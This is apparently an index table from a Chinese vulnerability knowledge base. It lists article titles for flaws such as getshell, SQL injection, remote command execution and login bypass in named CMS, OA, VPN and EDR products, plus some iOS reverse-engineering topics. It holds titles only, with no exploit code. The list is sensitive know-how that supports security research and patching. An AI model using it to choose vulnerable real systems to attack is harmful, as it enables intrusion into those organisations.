| 955  | Web安全 | Zzzcms                         | {'id': 6113, 'name': 'Zzzcms v1.75 后台地址泄露', 'pid': 158, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6113, 'title': None}                                                                           |
| 956  | Web安全 | Zzzcms                         | {'id': 6114, 'name': 'Zzzcms v1.75 后台任意文件读取', 'pid': 158, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6114, 'title': None}                                                                         |
| 957  | Web安全 | 74cms                          | {'id': 5591, 'name': '74cms v4.2.1 - v4.2.129-后台getshell漏洞', 'pid': 2, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5591, 'title': None}                                                            |
| 958  | Web安全 | 74cms                          | {'id': 5592, 'name': '74cms v4.2.126-前台四处sql注入', 'pid': 2, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5592, 'title': None}                                                                        |
| 959  | Web安全 | 74cms                          | {'id': 5594, 'name': '74cms v4.2.126-通杀sql注入', 'pid': 2, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5594, 'title': None}                                                                          |
| 960  | Web安全 | 74cms                          | {'id': 5593, 'name': '74cms v4.2.126-任意文件读取漏洞', 'pid': 2, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5593, 'title': None}                                                                         |
| 961  | Web安全 | 74cms                          | {'id': 5595, 'name': '74cms v4.2.126-因任意文件读取漏洞导致的任意用户密码修改漏洞', 'pid': 2, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5595, 'title': None}                                                           |
| 962  | Web安全 | 74cms                          | {'id': 5597, 'name': ' 74cms v4.2.3 任意文件删除', 'pid': 2, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5597, 'title': None}                                                                            |
| 963  | Web安全 | 74cms                          | {'id': 5596, 'name': '74cms v4.2.3 备份文件爆破', 'pid': 2, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5596, 'title': None}                                                                             |
| 964  | Web安全 | 74cms                          | {'id': 6568, 'name': '74cms v4.2.3 任意文件读取', 'pid': 2, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6568, 'title': None}                                                                             |
| 965  | Web安全 | 74cms                          | {'id': 5598, 'name': '74cms v5.0.1远程执行代码', 'pid': 2, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5598, 'title': None}                                                                              |
| 966  | Web安全 | 74cms                          | {'id': 5599, 'name': '74cms v5.0.1前台sql注入', 'pid': 2, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5599, 'title': None}                                                                             |
| 967  | Web安全 | 74cms                          | {'id': 6478, 'name': '（CVE-2019-11374）74cms v5.0.1 后台跨站请求伪造(CSRF)漏洞', 'pid': 2, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6478, 'title': None}                                                   |
| 968  | Web安全 | 74cms                          | {'id': 5600, 'name': '74cms v6.0.4 反射型xss', 'pid': 2, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5600, 'title': None}                                                                             |
| 969  | Web安全 | 74cms                          | {'id': 7256, 'name': '74cms < v6.0.48 远程命令执行漏洞', 'pid': 2, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7256, 'title': None}                                                                        |
| 970  | Web安全 | 百家cms                          | {'id': 6115, 'name': '百家cms v4.1.4 任意文件删除漏洞', 'pid': 159, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6115, 'title': None}                                                                         |
| 971  | Web安全 | 百家cms                          | {'id': 6116, 'name': '百家cms v4.1.4 任意路径删除漏洞', 'pid': 159, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6116, 'title': None}                                                                         |
| 972  | Web安全 | 百家cms                          | {'id': 6117, 'name': '百家cms v4.1.4 远程文件上传漏洞', 'pid': 159, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6117, 'title': None}                                                                         |
| 973  | Web安全 | 百家cms                          | {'id': 6118, 'name': '百家cms v4.1.4 远程命令执行漏洞', 'pid': 159, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6118, 'title': None}                                                                         |
| 974  | Web安全 | 宝塔                             | {'id': 7055, 'name': '宝塔 Phpmyadmin 未授权访问漏洞', 'pid': 381, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7055, 'title': None}                                                                         |
| 975  | Web安全 | 宝塔                             | {'id': 7178, 'name': '宝塔Windows v6.5.0 解析漏洞', 'pid': 381, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7178, 'title': None}                                                                         |
| 976  | Web安全 | 禅道                             | {'id': 6152, 'name': '禅道8.2-9.2.1 注入GetShell', 'pid': 164, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6152, 'title': None}                                                                        |
| 977  | Web安全 | 禅道                             | {'id': 6153, 'name': '禅道 11.6 sql注入漏洞', 'pid': 164, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6153, 'title': None}                                                                               |
| 978  | Web安全 | 禅道                             | {'id': 6154, 'name': '禅道 11.6 任意文件读取', 'pid': 164, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6154, 'title': None}                                                                                |
| 979  | Web安全 | 禅道                             | {'id': 6155, 'name': '禅道 11.6 远程命令执行漏洞', 'pid': 164, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6155, 'title': None}                                                                              |
| 980  | Web安全 | 禅道                             | {'id': 7188, 'name': '禅道 <= v12.4.2 后台getshell', 'pid': 164, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7188, 'title': None}                                                                      |
| 981  | Web安全 | 禅知                             | {'id': 6150, 'name': '禅知Pro 1.6 前台任意文件读取', 'pid': 163, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6150, 'title': None}                                                                            |
| 982  | Web安全 | 禅知                             | {'id': 6151, 'name': '禅知后台getshell', 'pid': 163, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6151, 'title': None}                                                                                  |
| 983  | Web安全 | 稻草人cms                         | {'id': 6729, 'name': '稻草人cms 1.1.5 安装过程信息泄露和getshell', 'pid': 309, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6729, 'title': None}                                                                |
| 984  | Web安全 | 稻草人cms                         | {'id': 6730, 'name': '稻草人cms 1.1.5 后台任意文件上传导致getshell', 'pid': 309, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6730, 'title': None}                                                               |
| 985  | Web安全 | 稻草人cms                         | {'id': 6732, 'name': '稻草人cms 1.1.5 后台任意文件删除', 'pid': 309, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6732, 'title': None}                                                                         |
| 986  | Web安全 | 泛微OA                           | {'id': 6560, 'name': '泛微OA 日志泄露', 'pid': 160, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6560, 'title': None}                                                                                     |
| 987  | Web安全 | 泛微OA                           | {'id': 6119, 'name': '泛微OA 数据库配置文件读取', 'pid': 160, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6119, 'title': None}                                                                                |
| 988  | Web安全 | 泛微OA                           | {'id': 6120, 'name': '泛微OA WorkflowCenterTreeData接口注入漏洞(限oracle数据库)', 'pid': 160, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6120, 'title': None}                                                 |
| 989  | Web安全 | 泛微OA                           | {'id': 6121, 'name': '泛微OA 管理系统RCE漏洞', 'pid': 160, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6121, 'title': None}                                                                                |
| 990  | Web安全 | 泛微OA                           | {'id': 7155, 'name': '泛微云桥 E-Bridge 2018 2019 任意文件读取', 'pid': 160, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7155, 'title': None}                                                                |
| 991  | Web安全 | 泛微OA                           | {'id': 6559, 'name': '泛微OA E-cology <=9.0 远程代码执行漏洞', 'pid': 160, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6559, 'title': None}                                                                  |
| 992  | Web安全 | 泛微OA                           | {'id': 7154, 'name': '泛微OA E-cology <=9.0 sql注入漏洞（一）', 'pid': 160, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7154, 'title': None}                                                                |
| 993  | Web安全 | 泛微OA                           | {'id': 7190, 'name': '泛微OA E-cology <=9.0 sql注入漏洞（二）', 'pid': 160, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7190, 'title': None}                                                                |
| 994  | Web安全 | 泛微OA                           | {'id': 7191, 'name': '泛微OA E-cology <= v9.0 sql注入漏洞（三）', 'pid': 160, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7191, 'title': None}                                                              |
| 995  | Web安全 | 泛微OA                           | {'id': 7175, 'name': '泛微OA v9.0 前台getshell', 'pid': 160, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7175, 'title': None}                                                                          |
| 996  | Web安全 | 蓝天采集器                          | {'id': 6706, 'name': '蓝天采集器 v2.3.1 后台getshell', 'pid': 307, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6706, 'title': None}                                                                       |
| 997  | Web安全 | 好视通                            | {'id': 7314, 'name': '（CNVD-2020-62437）好视通视频会议系统 任意文件下载漏洞', 'pid': 473, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7314, 'title': None}                                                           |
| 998  | Web安全 | 华天动力                           | {'id': 7260, 'name': '华天动力 OA8000 前台sql注入漏洞', 'pid': 450, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7260, 'title': None}                                                                         |
| 999  | Web安全 | 联软科技                           | {'id': 7151, 'name': '联软准入 任意文件上传漏洞', 'pid': 418, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7151, 'title': None}                                                                                 |
| 1000 | Web安全 | 南京南软科技有限公司                     | {'id': 7305, 'name': '（CNVD-2020-10526）南京南软科技有限公司 研究生管理信息系统 任意密码修改漏洞', 'pid': 469, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7305, 'title': None}                                                |
| 1001 | Web安全 | 南京南软科技有限公司                     | {'id': 7306, 'name': '（CNVD-2020-21993）南京南软科技有限公司 研究生管理信息系统 逻辑缺陷漏洞', 'pid': 469, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7306, 'title': None}                                                  |
| 1002 | Web安全 | 狂雨cms                          | {'id': 7310, 'name': '狂雨cms 前台远程命令执行漏洞', 'pid': 472, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7310, 'title': None}                                                                              |
| 1003 | Web安全 | 狂雨cms                          | {'id': 7311, 'name': '狂雨cms 后台文件包含漏洞', 'pid': 472, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7311, 'title': None}                                                                                |
| 1004 | Web安全 | 狂雨cms                          | {'id': 7312, 'name': '狂雨cms 后台sql代码执行漏洞', 'pid': 472, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7312, 'title': None}                                                                             |
| 1005 | Web安全 | 狂雨cms                          | {'id': 7313, 'name': '狂雨cms 数据库备份地址爆破', 'pid': 472, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7313, 'title': None}                                                                               |
| 1006 | Web安全 | 齐治堡垒机                          | {'id': 6765, 'name': '（CNVD-2019-09593）齐治堡垒机 ShtermClient-2.1.1 命令执行漏洞', 'pid': 318, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6765, 'title': None}                                              |
| 1007 | Web安全 | 齐治堡垒机                          | {'id': 6764, 'name': '（CNVD-2019-17294）齐治堡垒机 v5.0 后台命令执行漏洞', 'pid': 318, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6764, 'title': None}                                                          |
| 1008 | Web安全 | 齐治堡垒机                          | {'id': 6761, 'name': '（CNVD-2019-20835）齐治堡垒机 前台远程命令执行漏洞', 'pid': 318, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6761, 'title': None}                                                             |
| 1009 | Web安全 | 齐治堡垒机                          | {'id': 7180, 'name': '（CNVD-2020-56016）齐治堡垒机 v5.0 远程命令执行漏洞', 'pid': 318, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7180, 'title': None}                                                          |
| 1010 | Web安全 | 绿盟                             | {'id': 7176, 'name': '绿盟UTS综合威胁探针 任意管理员登录漏洞', 'pid': 429, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7176, 'title': None}                                                                         |
| 1011 | Web安全 | 深信服                            | {'id': 7050, 'name': '深信服 终端检测相应平台（EDR） 任意用户登陆漏洞', 'pid': 380, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7050, 'title': None}                                                                    |
| 1012 | Web安全 | 深信服                            | {'id': 7051, 'name': '深信服 终端检测相应平台（EDR） 任意命令执行漏洞（一）', 'pid': 380, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7051, 'title': None}                                                                 |
| 1013 | Web安全 | 深信服                            | {'id': 7126, 'name': '深信服 终端检测相应平台（EDR） 任意命令执行漏洞（二）', 'pid': 380, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7126, 'title': None}                                                                 |
| 1014 | Web安全 | 深信服                            | {'id': 7197, 'name': '深信服 SSL VPN 任意代码执行漏洞', 'pid': 380, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7197, 'title': None}                                                                          |
| 1015 | Web安全 | 深信服                            | {'id': 7129, 'name': '深信服 SSL VPN - Pre Auth 修改绑定手机', 'pid': 380, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7129, 'title': None}                                                                 |
| 1016 | Web安全 | 深信服                            | {'id': 7130, 'name': '深信服 SSL VPN - Pre Auth 任意密码重置', 'pid': 380, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7130, 'title': None}                                                                 |
| 1017 | Web安全 | 数字化校园管理平台                      | {'id': 7143, 'name': '数字化校园平台 校园综合管理系统 任意文件上传漏洞', 'pid': 415, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7143, 'title': None}                                                                     |
| 1018 | Web安全 | 深圳市科皓信息技术有限公司                  | {'id': 7304, 'name': '（CNVD-2020-10530）深圳市科皓信息技术有限公司 测站综合管理平台 逻辑缺陷漏洞', 'pid': 468, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7304, 'title': None}                                                |
| 1019 | Web安全 | 思福迪                            | {'id': 7296, 'name': '思福迪堡垒机任意⽤户登录漏洞', 'pid': 463, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7296, 'title': None}                                                                                |
| 1020 | Web安全 | 通达oa                           | {'id': 6964, 'name': '通达oa 小技巧', 'pid': 161, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6964, 'title': None}                                                                                      |
| 1021 | Web安全 | 通达oa                           | {'id': 6697, 'name': '通达oa 2007 sql注入漏洞', 'pid': 161, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6697, 'title': None}                                                                             |
| 1022 | Web安全 | 通达oa                           | {'id': 6122, 'name': '通达oa 2011-2013 通杀getshell', 'pid': 161, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6122, 'title': None}                                                                     |
| 1023 | Web安全 | 通达oa                           | {'id': 6123, 'name': '（WooYun-2014-82678）通达oa 2013 2015 未授权获取帐号', 'pid': 161, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6123, 'title': None}                                                     |
| 1024 | Web安全 | 通达oa                           | {'id': 6124, 'name': '通达oa 2013 2015 XFF导致日志混淆', 'pid': 161, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6124, 'title': None}                                                                      |
| 1025 | Web安全 | 通达oa                           | {'id': 6125, 'name': '通达oa 2013 2015 ⻚面敏感信息泄露', 'pid': 161, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6125, 'title': None}                                                                       |
| 1026 | Web安全 | 通达oa                           | {'id': 6126, 'name': '通达oa 2013 2015 任意账号跳转', 'pid': 161, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6126, 'title': None}                                                                         |
| 1027 | Web安全 | 通达oa                           | {'id': 6127, 'name': '通达oa 2013 2015 文件包含漏洞', 'pid': 161, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6127, 'title': None}                                                                         |
| 1028 | Web安全 | 通达oa                           | {'id': 6128, 'name': '通达oa 2013 2015 sql注入', 'pid': 161, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6128, 'title': None}                                                                          |
| 1029 | Web安全 | 通达oa                           | {'id': 6129, 'name': '通达oa 2013 2015 xss', 'pid': 161, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6129, 'title': None}                                                                            |
| 1030 | Web安全 | 通达oa                           | {'id': 6130, 'name': '通达oa 2013 2015 越权访问', 'pid': 161, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6130, 'title': None}                                                                           |
| 1031 | Web安全 | 通达oa                           | {'id': 6131, 'name': '通达oa 2013 2015 数据库脚本导⼊getshell', 'pid': 161, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6131, 'title': None}                                                                |
| 1032 | Web安全 | 通达oa                           | {'id': 6132, 'name': '通达oa 2013 2015 任意⽂件上传漏洞', 'pid': 161, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6132, 'title': None}                                                                       |
| 1033 | Web安全 | 通达oa                           | {'id': 6134, 'name': '通达oa 2013 2015 2016 2017 V11 任意文件上传、远程命令执行漏洞、文件包含漏洞', 'pid': 161, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6134, 'title': None}                                           |
| 1034 | Web安全 | 通达oa                           | {'id': 7340, 'name': '通达oa 2017 任意文件上传漏洞', 'pid': 161, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7340, 'title': None}                                                                            |
| 1035 | Web安全 | 通达oa                           | {'id': 6133, 'name': '通达oa v11.2 后台getshell', 'pid': 161, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6133, 'title': None}                                                                         |
| 1036 | Web安全 | 通达oa                           | {'id': 6135, 'name': '通达OA < 11.5.200417 任意用户登录漏洞', 'pid': 161, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6135, 'title': None}                                                                   |
| 1037 | Web安全 | 通达oa                           | {'id': 7053, 'name': '通达oa v11.5 sql注入漏洞', 'pid': 161, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7053, 'title': None}                                                                            |
| 1038 | Web安全 | 通达oa                           | {'id': 7054, 'name': '通达oa v11.5 未授权访问漏洞', 'pid': 161, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7054, 'title': None}                                                                            |
| 1039 | Web安全 | 通达oa                           | {'id': 7052, 'name': '通达oa v11.6 任意文件删除 & 文件上传漏洞', 'pid': 161, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7052, 'title': None}                                                                    |
| 1040 | Web安全 | 通达oa                           | {'id': 7373, 'name': '通达oa <= v11.6 任意文件上传漏洞', 'pid': 161, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7373, 'title': None}                                                                        |
| 1041 | Web安全 | 通达oa                           | {'id': 7091, 'name': '通达oa v11.7 后台sql注入漏洞、远程命令执行漏洞', 'pid': 161, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7091, 'title': None}                                                                 |
| 1042 | Web安全 | 通达oa                           | {'id': 7192, 'name': '通达oa v11.7 后台邮箱模块sql注入漏洞', 'pid': 161, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7192, 'title': None}                                                                      |
| 1043 | Web安全 | 通达oa                           | {'id': 7152, 'name': '通达oa v11.7 后台getshell', 'pid': 161, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7152, 'title': None}                                                                         |
| 1044 | Web安全 | 通达oa                           | {'id': 7356, 'name': '通达oa v11.7 后台sql注入漏洞', 'pid': 161, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7356, 'title': None}                                                                          |
| 1045 | Web安全 | 天融信                            | {'id': 7177, 'name': '天融信 Top-app LB负载均衡 sql注入漏洞', 'pid': 428, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7177, 'title': None}                                                                    |
| 1046 | Web安全 | 天融信                            | {'id': 7174, 'name': '天融信 数据防泄漏系统越权修改密码漏洞', 'pid': 428, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7174, 'title': None}                                                                           |
| 1047 | Web安全 | 微擎                             | {'id': 6156, 'name': '微擎 后台绕过禁用函数写shell', 'pid': 165, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6156, 'title': None}                                                                             |
| 1048 | Web安全 | 微擎                             | {'id': 6157, 'name': '微擎 低权限后台getshell', 'pid': 165, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6157, 'title': None}                                                                              |
| 1049 | Web安全 | 微擎                             | {'id': 6695, 'name': '微擎 0.7 sql注入漏洞', 'pid': 165, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6695, 'title': None}                                                                                |
| 1050 | Web安全 | 微擎                             | {'id': 6696, 'name': '微擎 0.8 后台任意文件删除', 'pid': 165, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6696, 'title': None}                                                                               |
| 1051 | Web安全 | 微擎                             | {'id': 6158, 'name': '微擎cms v1.8.2 后台getshell', 'pid': 165, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6158, 'title': None}                                                                       |
| 1052 | Web安全 | 微擎                             | {'id': 6159, 'name': '微擎cms v2.1.2 后台getshell', 'pid': 165, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6159, 'title': None}                                                                       |
| 1053 | Web安全 | 信呼oa                           | {'id': 6724, 'name': '信呼oa 1.9.0-1.9.1 储存型xss', 'pid': 308, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6724, 'title': None}                                                                       |
| 1054 | Web安全 | 新开普电子股份有限公司                    | {'id': 7315, 'name': '（CNVD-2020-68869）新开普电子股份有限公司 物联网平台任意文件下载漏洞', 'pid': 474, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7315, 'title': None}                                                    |
| 1055 | Web安全 | 宜兴易发 CMS                       | {'id': 7270, 'name': '宜兴易发 CMS 后台getshell', 'pid': 455, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7270, 'title': None}                                                                           |
| 1056 | Web安全 | 用友                             | {'id': 7179, 'name': '用友 GRP-u8 注入漏洞', 'pid': 397, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7179, 'title': None}                                                                                |
| 1057 | Web安全 | 用友                             | {'id': 7266, 'name': '用友nc IUFO v5.3 反射型xss', 'pid': 397, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7266, 'title': None}                                                                         |
| 1058 | Web安全 | 用友                             | {'id': 7098, 'name': '用友nc v6.5 反序列化漏洞', 'pid': 397, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7098, 'title': None}                                                                              |
| 1059 | Web安全 | 用友                             | {'id': 7264, 'name': '用友nc v6.5 前台任意文件上传漏洞', 'pid': 397, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7264, 'title': None}                                                                          |
| 1060 | Web安全 | 用友                             | {'id': 7265, 'name': '用友nc v6.5 反射型xss', 'pid': 397, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7265, 'title': None}                                                                              |
| 1061 | Web安全 | 有道云笔记                          | {'id': 6160, 'name': '有道云笔记/印象笔记 windows客户端代码执行&本地文件读取', 'pid': 166, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6160, 'title': None}                                                              |
| 1062 | Web安全 | 致远oa                           | {'id': 6701, 'name': '致远OA 帆软报表组件 前台XXE漏洞', 'pid': 162, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6701, 'title': None}                                                                           |
| 1063 | Web安全 | 致远oa                           | {'id': 6136, 'name': '致远OA Session泄漏漏洞', 'pid': 162, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6136, 'title': None}                                                                              |
| 1064 | Web安全 | 致远oa                           | {'id': 6137, 'name': '致远OA A6 test.jsp sql注入漏洞', 'pid': 162, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6137, 'title': None}                                                                      |
| 1065 | Web安全 | 致远oa                           | {'id': 6138, 'name': '致远OA A6 search\_result.jsp sql注入漏洞', 'pid': 162, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6138, 'title': None}                                                            |
| 1066 | Web安全 | 致远oa                           | {'id': 6139, 'name': '致远OA A6 setextno.jsp sql注入漏洞', 'pid': 162, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6139, 'title': None}                                                                  |
| 1067 | Web安全 | 致远oa                           | {'id': 6140, 'name': '致远OA A6 重置数据库账号密码漏洞', 'pid': 162, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6140, 'title': None}                                                                           |
| 1068 | Web安全 | 致远oa                           | {'id': 6141, 'name': '致远OA A6 敏感信息泄露（一）', 'pid': 162, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6141, 'title': None}                                                                             |
| 1069 | Web安全 | 致远oa                           | {'id': 6142, 'name': '致远OA A6 敏感信息泄露（二）', 'pid': 162, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6142, 'title': None}                                                                             |
| 1070 | Web安全 | 致远oa                           | {'id': 7358, 'name': '致远OA A6-V5 任意文件下载漏洞', 'pid': 162, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7358, 'title': None}                                                                           |
| 1071 | Web安全 | 致远oa                           | {'id': 6143, 'name': '致远OA A8 未授权访问', 'pid': 162, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6143, 'title': None}                                                                                 |
| 1072 | Web安全 | 致远oa                           | {'id': 6144, 'name': '致远OA A8 任意用户密码修改漏洞', 'pid': 162, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6144, 'title': None}                                                                            |
| 1073 | Web安全 | 致远oa                           | {'id': 6145, 'name': '致远OA A8 系统远程命令执行漏洞', 'pid': 162, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6145, 'title': None}                                                                            |
| 1074 | Web安全 | 致远oa                           | {'id': 6146, 'name': '致远OA A8-m 后台万能密码', 'pid': 162, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6146, 'title': None}                                                                              |
| 1075 | Web安全 | 致远oa                           | {'id': 6147, 'name': '致远OA A8-m 存在sql语句页面回显功能', 'pid': 162, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6147, 'title': None}                                                                       |
| 1076 | Web安全 | 致远oa                           | {'id': 6148, 'name': '致远OA A8-v5 无视验证码撞库', 'pid': 162, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6148, 'title': None}                                                                            |
| 1077 | Web安全 | 致远oa                           | {'id': 6149, 'name': '致远OA A8-v5 任意用户密码修改', 'pid': 162, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6149, 'title': None}                                                                           |
| 1078 | Web安全 | 更新日志                           | {'id': 4729, 'name': '更新日志', 'pid': 1, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 4729, 'title': None}                                                                                            |
| 1079 | 系统安全  | IOS                            | {'id': 6606, 'name': 'IOS 逆向工程介绍', 'pid': 280, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6606, 'title': None}                                                                                    |
| 1080 | 系统安全  | IOS                            | {'id': 6607, 'name': 'IOS 逆向工程的作用', 'pid': 280, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6607, 'title': None}                                                                                   |
| 1081 | 系统安全  | IOS                            | {'id': 6608, 'name': 'IOS 逆向工程的两种分析方法', 'pid': 280, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6608, 'title': None}                                                                               |
| 1082 | 系统安全  | IOS                            | {'id': 6609, 'name': 'IOS 逆向工程用到的工具简介', 'pid': 280, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6609, 'title': None}                                                                               |
| 1083 | 系统安全  | IOS                            | {'id': 6610, 'name': 'IOS 文件目录及结构', 'pid': 281, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6610, 'title': None}                                                                                   |
| 1084 | 系统安全  | IOS                            | {'id': 6611, 'name': 'IOS 程序类型', 'pid': 281, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6611, 'title': None}                                                                                      |
| 1085 | 系统安全  | IOS                            | {'id': 6628, 'name': 'IOS文件查看工具iFunbox', 'pid': 286, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6628, 'title': None}                                                                              |
| 1086 | 系统安全  | IOS                            | {'id': 6629, 'name': '网络流量分析工具Charles', 'pid': 286, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6629, 'title': None}                                                                               |
| 1087 | 系统安全  | IOS                            | {'id': 6630, 'name': 'SQLite Database Browser简介', 'pid': 286, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6630, 'title': None}                                                                     |
| 1088 | 系统安全  | IOS                            | {'id': 6631, 'name': 'Reveal：分析iOS UI的利器', 'pid': 286, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6631, 'title': None}                                                                            |
| 1089 | 系统安全  | IOS                            | {'id': 6632, 'name': '使用frida-ios-dump获得iOS应用程序的类信息', 'pid': 286, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6632, 'title': None}                                                                 |
| 1090 | 系统安全  | IOS                            | {'id': 6633, 'name': 'Theos：越狱程序开发框架', 'pid': 286, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6633, 'title': None}                                                                                |
